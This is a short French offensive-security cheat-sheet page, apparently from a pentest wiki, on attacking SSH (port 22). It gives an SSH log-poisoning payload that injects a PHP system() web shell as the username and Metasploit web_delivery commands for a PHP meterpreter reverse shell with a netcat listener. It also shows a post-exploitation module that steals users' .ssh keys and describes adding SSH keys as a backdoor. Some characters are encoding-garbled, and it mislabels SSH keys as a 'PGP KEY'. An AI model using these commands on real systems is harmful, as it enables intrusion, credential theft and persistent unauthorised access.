SSH - 22
1. Payload Basiques SSH
On peut injecter du code php dans la connexion SSH. TrÚs utile si on a accÚs aux logs ssh depuis une interface web par exemple. On peut ensuite aller voir les logs et donc exécuter le code que nous avons soumis.
ssh â<?php system($_GET[âcâ]); ?>â@<ip> #permet dâexĂ©cuter une commande
On peut ensuite gentiment demander à metasploit de nous créer un meterpreter en reverse tcp :
msfconsole
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost <IP>
exploit
On peut aussi écrire manuellement le reverse shell.
A. Accéder aux logs pour exécuter votre shell php
(var/auth/logs)
B. Vous pouvez ensuite exécuter directement votre commande
(var/auth/logs&c=<votre commande>
C. Setup un Listener
nc -lnvp <PORT>
2. Exploit SSH en volant la PGP KEY
Si vous avez déjà exploité la cible et que vous avez un meterpreter dessus, vous pouvez utiliser la post exploitation de msf pour voler les clés autorisées.
Ce module collectera le contenu des répertoires .ssh de tous les utilisateurs sur la machine ciblée. De plus, les hÎtes connus, les clés autorisées et tout autre fichier sont également téléchargés :
msfconsole
use post/multi/gather/ssh_creds
msf post(ssh_creds) >set session 1
msf post(ssh_creds) >exploit
3. CrĂ©ation dâune Backdoor
Ce module ajoutera une clé SSH à un utilisateur spécifié (ou à tous), pour permettre la connexion à distance via SSH à tout moment.
4. SSH tunneling
On parle du tunneling ici : https://white0x3paper.com/2020/07/07/tunneling-et-port-forwarding/
Last updated
Was this helpful?